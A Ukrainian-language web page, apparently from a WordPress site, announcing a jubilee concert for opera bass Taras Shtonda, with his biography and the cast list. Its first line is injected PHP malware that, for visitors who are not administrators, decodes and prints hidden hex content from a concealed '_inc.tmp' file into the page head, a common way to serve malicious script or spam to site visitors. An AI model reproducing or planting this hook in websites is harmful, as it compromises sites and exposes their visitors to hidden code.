if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “Тарас Штонда запрошує…” 24 лютого

“Тарас Штонда запрошує…” 24 лютого

24 лютого – Концерт “Тарас Штонда запрошує…”. З нагоди 50-річчя від дня народження та 25-ти років творчої діяльності співака.

Ім’я Народного артиста України Тараса Штонди відоме далеко за межами України, оскільки співака заслужено називають одним з найкращих басів сучасної опери. Його голос порівнюють з шаляпінським. Та й сам артист вважає, що «всередині нього вже більше 30 років живе Шаляпін».

Любов до музики маленькому Тарасу прищепили батьки – музиканти-аматори, а першими орієнтирами в світі музики стали арії, записані на платівках, які юний талант розучував, ще не будучи знайомим з усіма тонкощами вокальної майстерності. У “репертуарі” хлопчика була і арія Манріко з “Трубадура”, і дует Одарки й Карася (за обох) із “Запорожця за Дунаєм”, романси з репертуару Бориса Штоколова. Але кумиром завжди був і залишався Федір Шаляпін.

Як не дивно, але в 7 років Тарас замовк, соромлячись співати. Лише по закінченні училища ім. Глієра і вступивши до Київської державної консерваторії ім. П. І. Чайковського (клас Галини Сухорукової), він поступово став «розкриватися» у вокальному жанрі.

Ще студентом Тарас Штонда дебютував на сцені Національної опери України в партії Грєміна в «Євгенії Онєгіні». У тому ж 1992 році він став солістом театру.

За плечима співака – участь у численних міжнародних конкурсах та фестивалях, виконання головних ролей басового репертуару на сцені Національної Опери, гастролі по всьому світу, робота з найвідомішими диригентами сучасності. 

У ювілейній концертній програмі “Тарас Штонда запрошує…”: арії, дуети і сцени з відомих опер виконають: Тарас Штонда, Сергій Магера, Олександр Гурець, Оксана Крамарєва, Сусанна Чахоян, Сергій Ковнір, Тетяна Ганіна, Олександр Бойко, Валентин Дитюк. Симфонічний оркестр Національної опери України. Диригент – Алла Кульбаба. Хор Національної опери України. Хормейстер – Богдан Пліш. Режисер-постановник – Анатолій Солов’яненко. Художник-постановник – Марія Левитська.

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне